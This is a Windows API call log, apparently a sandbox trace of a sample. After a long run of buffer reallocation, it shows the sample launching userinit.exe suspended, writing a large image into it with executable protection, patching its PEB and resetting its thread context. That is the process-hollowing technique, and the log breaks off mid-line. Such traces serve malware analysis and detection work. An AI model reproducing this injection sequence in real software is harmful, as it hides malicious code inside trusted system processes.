[0137.196] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0137.197] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0137.197] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0137.197] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0137.199] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0137.199] ReadFile (in: hFile=0x110, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0137.206] CloseHandle (hObject=0x110) returned 1
[0137.206] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.207] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.207] GlobalUnlock (hMem=0x95000c) returned 0
[0137.207] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0137.207] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.208] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.208] GlobalUnlock (hMem=0x95000c) returned 0
[0137.208] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0137.209] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0137.209] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0137.209] GlobalUnlock (hMem=0x95000c) returned 0
[0137.210] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0137.210] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0137.211] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0137.211] GlobalUnlock (hMem=0x95000c) returned 0
[0137.211] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0137.211] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0137.212] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0137.212] GlobalUnlock (hMem=0x95000c) returned 0
[0137.212] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0137.213] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0137.214] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0137.214] GlobalUnlock (hMem=0x95000c) returned 0
[0137.214] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0137.215] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.216] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.216] GlobalUnlock (hMem=0x95000c) returned 0
[0137.216] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0137.216] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.217] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.217] GlobalUnlock (hMem=0x95000c) returned 0
[0137.217] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0137.217] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.218] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.218] GlobalUnlock (hMem=0x95000c) returned 0
[0137.218] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0137.218] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.219] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.219] GlobalUnlock (hMem=0x95000c) returned 0
[0137.219] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0137.219] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.220] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.220] GlobalUnlock (hMem=0x95000c) returned 0
[0137.220] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0137.220] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.221] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.221] GlobalUnlock (hMem=0x95000c) returned 0
[0137.221] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0137.221] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.222] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.222] GlobalUnlock (hMem=0x95000c) returned 0
[0137.222] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0137.222] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.223] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.223] GlobalUnlock (hMem=0x95000c) returned 0
[0137.223] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0137.223] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.224] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.224] GlobalUnlock (hMem=0x95000c) returned 0
[0137.224] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0137.224] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.225] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.225] GlobalUnlock (hMem=0x95000c) returned 0
[0137.225] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0137.227] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0137.228] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0137.228] GlobalUnlock (hMem=0x95000c) returned 0
[0137.228] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0137.228] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0137.229] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0137.229] GlobalUnlock (hMem=0x95000c) returned 0
[0137.229] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0137.231] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0137.232] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0137.232] GlobalUnlock (hMem=0x95000c) returned 0
[0137.232] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0137.233] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.233] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.233] GlobalUnlock (hMem=0x95000c) returned 0
[0137.233] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0137.233] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.234] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.234] GlobalUnlock (hMem=0x95000c) returned 0
[0137.234] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0137.234] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.235] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.235] GlobalUnlock (hMem=0x95000c) returned 0
[0137.235] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0137.236] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.236] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.236] GlobalUnlock (hMem=0x95000c) returned 0
[0137.236] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0137.236] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.237] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.237] GlobalUnlock (hMem=0x95000c) returned 0
[0137.237] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0137.237] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.238] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.238] GlobalUnlock (hMem=0x95000c) returned 0
[0137.238] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0137.238] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.239] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.239] GlobalUnlock (hMem=0x95000c) returned 0
[0137.239] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0137.239] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.240] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.240] GlobalUnlock (hMem=0x95000c) returned 0
[0137.240] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0137.240] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.241] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.241] GlobalUnlock (hMem=0x95000c) returned 0
[0137.241] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0137.241] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.242] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.242] GlobalUnlock (hMem=0x95000c) returned 0
[0137.242] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0137.242] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.243] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.243] GlobalUnlock (hMem=0x95000c) returned 0
[0137.243] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0137.243] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.244] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.244] GlobalUnlock (hMem=0x95000c) returned 0
[0137.244] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0137.244] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.245] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.245] GlobalUnlock (hMem=0x95000c) returned 0
[0137.245] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0137.245] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.246] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.246] GlobalUnlock (hMem=0x95000c) returned 0
[0137.246] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0137.246] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.247] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.247] GlobalUnlock (hMem=0x95000c) returned 0
[0137.247] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0137.247] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.248] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.248] GlobalUnlock (hMem=0x95000c) returned 0
[0137.248] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0137.248] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.249] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.249] GlobalUnlock (hMem=0x95000c) returned 0
[0137.249] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0137.249] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.250] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.250] GlobalUnlock (hMem=0x95000c) returned 0
[0137.250] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0137.250] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.251] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.251] GlobalUnlock (hMem=0x95000c) returned 0
[0137.251] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0137.251] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.251] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.251] GlobalUnlock (hMem=0x95000c) returned 0
[0137.251] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0137.252] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.252] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.252] GlobalUnlock (hMem=0x95000c) returned 0
[0137.252] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0137.252] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.253] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.253] GlobalUnlock (hMem=0x95000c) returned 0
[0137.253] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0137.253] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.254] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.254] GlobalUnlock (hMem=0x95000c) returned 0
[0137.254] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0137.254] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.255] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.255] GlobalUnlock (hMem=0x95000c) returned 0
[0137.255] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0137.255] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.256] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.256] GlobalUnlock (hMem=0x95000c) returned 0
[0137.256] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0137.256] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.256] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.256] GlobalUnlock (hMem=0x95000c) returned 0
[0137.256] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0137.256] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.257] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.257] GlobalUnlock (hMem=0x95000c) returned 0
[0137.257] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0137.257] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0137.258] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x10c, hThread=0x110, dwProcessId=0x8a4, dwThreadId=0x89c)) returned 1
[0137.261] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0137.261] GetThreadContext (in: hThread=0x110, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x202be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x18fc98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0137.262] ReadProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0137.262] VirtualAllocEx (hProcess=0x10c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0137.262] VirtualAlloc (lpAddress=0x19e0000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x19e0000
[0137.268] WriteProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x400000, lpBuffer=0x19dfb8c*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x19dfb8c*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0137.280] WriteProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0137.280] SetThreadContext (hThread=0x110, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, 